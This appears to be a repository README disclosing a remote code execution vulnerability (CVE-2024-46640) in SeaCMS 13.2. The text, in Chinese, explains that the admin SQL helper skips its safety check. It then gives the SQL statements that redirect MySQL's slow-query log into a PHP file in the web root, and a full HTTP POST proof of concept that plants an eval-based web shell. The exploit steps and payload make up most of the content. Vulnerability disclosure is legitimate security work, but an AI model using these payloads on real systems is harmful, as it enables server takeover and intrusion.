# CVE-2024-46640

**Repository Path**: zheng_botong/CVE-2024-46640

## Basic Information

- **Project Name**: CVE-2024-46640
- **Description**: seacms 13.2 rce
- **Primary Language**: PHP
- **License**: AGPL-3.0
- **Default Branch**: master
- **Homepage**: None
- **GVP Project**: No

## Statistics

- **Stars**: 0
- **Forks**: 0
- **Created**: 2024-09-10
- **Last Updated**: 2024-09-20

## Categories & Tags

**Categories**: Uncategorized

**Tags**: None

## README

# 介绍

SeaCMS 13.2 存在远程代码执行。此漏洞在文件 sql.class.php处，虽然系统有检查的函数，但是在执行时不执行检查函数，导致可以通过mysql慢查询的方法，写入文件导致远程代码执行。

# 环境

![输入图片说明](imgimage-20240910113635756.png)


![输入图片说明](imgimage-20240910113714389.png)


# 分析
![输入图片说明](imgimage-20240910125718118.png)


在SQL高级助手处执行Sql语句，该参数赋值给$sql，然后执行安全检查，在调试时发现，该接口的不进行安全检查，如图 safecheck的值是false，sql语句可直接执行。
![输入图片说明](imgimage-20240910111640096.png)


![输入图片说明](imgimage-20240910112938430.png)

# 验证

使用sql高级助手，执行sql语句：

set global *slow_query_log=1*;

set global slow_query_log_file="D:/phpstudy_pro/SeaCMS/Upload/0chnys/sendmail.php"

select '<?php phpinfo());?>' or sleep(11);

该语句是把日志写入到sendmail.php中
![输入图片说明](imgimage-20240910125718118.png)


执行之后可以看到，代码已经写入到sendmail.php的结尾处：
![输入图片说明](imgimage-20240910125820026.png)


使用工具连接php马: http://localhost/0chnys/sendmail.php


![输入图片说明](imgimage-20240910125917853.png)


POC


```
POST http://localhost/0chnys/admin_datarelate.php?action=result HTTP/1.1
Host: localhost
Content-Length: 26
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/0chnys/admin_datarelate.php?action=sql
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: history=%5B%7B%22name%22%3A%22123%22%2C%22pic%22%3A%22%2Fpic%2Fnopic.gif%22%2C%22link%22%3A%22%2Fdetail%2F%3F1.html%22%2C%22part%22%3A%22%22%7D%5D; ssea3_score2=ok; ssea3_score2__ckMd5=1354b810d1cb1ee0; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MjY6InBocCB8IHBocD8gfCBwaHRtbCB8IHNodG1sIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D; PHPSESSID=t8hhjdd9bgmfsi3799a9rk6l6p
Connection: close

sql=select '<?php @eval($_POST["cmd"]);?>' or sleep(11);
```